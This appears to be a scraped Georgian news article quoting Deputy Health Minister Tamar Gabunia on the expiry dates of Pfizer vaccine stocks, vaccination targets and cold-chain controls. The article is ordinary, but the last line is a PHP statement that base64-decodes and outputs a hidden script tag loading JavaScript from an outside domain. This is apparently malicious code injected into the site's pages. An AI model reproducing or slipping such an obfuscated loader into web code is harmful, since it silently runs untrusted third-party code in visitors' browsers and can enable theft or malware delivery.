celsiusi
ავერსი საქკაბელი
„ფაიზერის“ მარაგის ნაწილს, რომელიც ქვეყანაშია, დღევანდელი მდგომარეობით ვადა აქვს ნოემბრის ბოლომდე და ნაწილს დეკემბრის ბოლომდე - ვფიქრობთ, რომ ნელი ტემპითაც, რომ გაგრძელდეს ვაქცინაცია, მის ათვისებას თავისუფლად შევძლებთ, - ამის შესახებ ჯანდაცვის მინისტრის მოადგილემ თამარ გაბუნიამ უწყებათაშორისი საკოორიდნაციო საბჭოს სხდომის დასრულების შემდეგ განაცხადა.
 
მისივე თქმით, ნებისმიერი გადაცდომა, რომელიც შესაძლებელია ვაქცინების ცივი ჯაჭვის პროცესში აღმოცენდეს, ძალიან მკაცრად კონტროლდება.
 
„ვაქცინაციის გეგმის სამიზნე იყო მოზრდილი მოსახლეობის 60%, რაც ჯამურად 1 700 000 მოქალაქეს ნიშნავს. ჩვენ ცოტა გვაქვს დარჩენილი მილიონი მოქალაქის მოცვამდე, რაც არის ოდნავ მეტი ვიდრე ნახევარი. რეალისტურად ის ვადები, რომელიც დარჩევნილია ვფიქრობ, რომ არის საკმაოდ კარგი ვადები სამიზნის შესასრულებლად, მაგრამ აუცილებელი იქნება მეტი აქტივობა, გასვლითი ღონისძიებები, მობილური ბრიგადების აქტიური გამოყენება და საგანმანათლებლო კამპანიის გააქტიურება. ვაქცინების მარაგი ქვეყანაში არის შეუზღუდავი. იყო გარკვეული მღელვარება ვადებთან დაკავშირებით, რაც აბსოლუტურად აზრს მოკლებულია, „ფაიზერის“ მარაგი, რომელიც ქვეყანაში არის მის ნაწილს დღევანდელი მდგომარეობით აქვს ნოემბრის ბოლომდე და ნაწილს დეკემბრის ბოლომდე - ვფიქრობთ, რომ ნელი ტემპითაც რომ გაგრძელდეს ვაქცინაცია, მის ათვისებას თავისუფლად შევძლებთ. ეს ნამდვილა არ არის სანერვიულო, სანერვიულო არის ის, რომ სწრაფად მოვახერხოთ ყველა იმ პირის აცრა, ვისაც ყველაზე მეტად სჭირდება ეს.
 
დაავადებათა კონტროლის ცენტრი არის პასუხისმგებელი საზოგადოებრივი ჯანდაცვის ცენტრებთან ერთად, ცივი ჯაჭვის ლოჯისტიკის ყველა ეტაპზე. იმ ვაქცინების დიდი ნაწილი, რომელიც მე თქვენ მოგახსენეთ, „ფაიზერის“ ვაქცინები ინახება დაავადებათა კონტროლის ცენტრის ულტრა-ცივ მაცივრებში, გარკვეული ნაწილი, ბუნებრივია, მიმდინარე გამოყენებისთვის გამოტანილია უკვე და ინახება 2-დან 8-გრადუსამდე ტემპერატურაზე, როგორც არის წესი. ასე, რომ მერწმუნეთ, ნებისმიერ დონეზე, ნებისმიერი გადაცდომა, რომელიც შესაძლებელია ვაქცინების ცივი ჯაჭვის პროცესში აღმოცენდეს, კონტროლდება ძალიან მკაცრად“, - განაცხადა გაბუნიამ.
1000
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");